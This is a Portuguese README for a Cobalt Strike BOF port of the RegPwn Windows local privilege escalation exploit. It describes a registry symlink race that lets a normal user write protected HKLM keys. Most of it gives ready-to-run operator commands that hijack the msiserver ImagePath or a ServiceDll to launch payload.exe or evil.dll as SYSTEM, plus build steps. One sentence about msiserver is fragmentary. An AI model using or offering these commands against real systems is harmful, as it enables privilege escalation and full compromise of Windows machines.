
Bof do RegPwn por MDSec
Porte BOF do Cobalt Strike do exploit RegPwn por Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.
Esta é uma reimplementação BOF desleixada do exploit original em C#. Todo o crédito pela pesquisa de vulnerabilidade e pelo exploit vai para Filip Dragovic e MDSec.
Explora uma condição de corrida (race condition) de symlink do registro no mecanismo ATConfig do Windows Accessibility para escrever valores arbitrários em chaves de registro protegidas do HKLM a partir do contexto de um usuário normal (Escalada de Privilégio Local).
Tem como alvo Windows 11 25H2/24H2, Windows 10 21H2 e Windows Server 2016/2019/2022 anteriores ao patch de março de 2026.
AVISO: Este exploit bloqueia a estação de trabalho como parte da condição de corrida.
O serviço msiserver (Windows Installer) ImagePath. Este serviço é executado como SYSTEM e pode ser iniciado por usuários normais.
Carregue regpwn.cna no Gerenciador de Scripts, então:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
Após o exploit ser bem-sucedido, inicie o serviço para executar como SYSTEM:
net start msiserver
Requer x86_64-w64-mingw32-gcc (compilador cruzado MinGW-w64).
make # compilar BOF (regpwn.x64.o)
make test # compilar EXE autônomo (regpwn.x64.exe)
make clean
Apenas x64.